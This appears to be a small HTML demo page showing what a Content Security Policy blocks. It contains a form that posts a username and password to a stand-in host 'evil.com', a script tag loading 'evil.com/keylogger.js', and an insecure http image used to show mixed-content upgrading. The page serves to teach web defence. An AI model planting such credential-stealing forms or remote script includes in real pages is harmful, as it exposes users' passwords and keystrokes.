CSP Demo

Who trusts this form?

<form action="https://evil.com/stealPassword.php">
<input type="text" name="firstname" value="Username">
<input type="text" name="lastname" value="Password">
<input type="submit" value="Submit">
</form> 



Let's load a bad script!

<script src="https://evil.com/keylogger.js"></script>


Mixed content gets fixed too!

<img src="http://scotthelme.co.uk/assets/images/profile-150.png">